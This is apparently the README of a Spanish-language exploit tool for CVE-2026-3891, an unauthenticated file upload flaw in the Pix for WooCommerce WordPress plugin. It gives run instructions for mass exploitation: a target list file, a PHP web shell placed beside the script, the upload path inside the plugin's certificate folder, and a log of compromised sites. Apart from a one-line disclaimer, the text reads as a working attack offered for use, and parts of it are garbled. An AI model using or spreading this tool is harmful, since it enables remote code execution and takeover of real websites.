
Pix for WooCommerce <= 1.5.0 - Subida de archivos arbitraria no autenticada
Pix for WooCommerce <= 1.5.0 - Subida de archivos arbitraria no autenticada
El plugin Pix for WooCommerce para WordPress es vulnerable a la subida de archivos arbitraria no autenticada debido a:
en la función lkn_pix_for_woocommerce_c6_save_settings en todas las versiones hasta la 1.5.0 inclusive.
Esto permite a atacantes remotos no autenticados subir archivos arbitrarios, lo que conduce a la ejecución remota de código (RCE).
CVE-2026-38919.8 (Crítico)CVE-2026-3891.py@Kxploitpip install requests rich
Crea un archivo:
list.txt
Ejemplo:
http://example.com
https://target.com
victim-site.com
Si falta el protocolo → el script añade automáticamente
http://
Coloca tu archivo shell en el mismo directorio:
shell.php
python3 CVE-2026-3891.py
El script preguntará:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
Este proyecto se proporciona solo con fines educativos y de pruebas de seguridad autorizadas.
Nxploited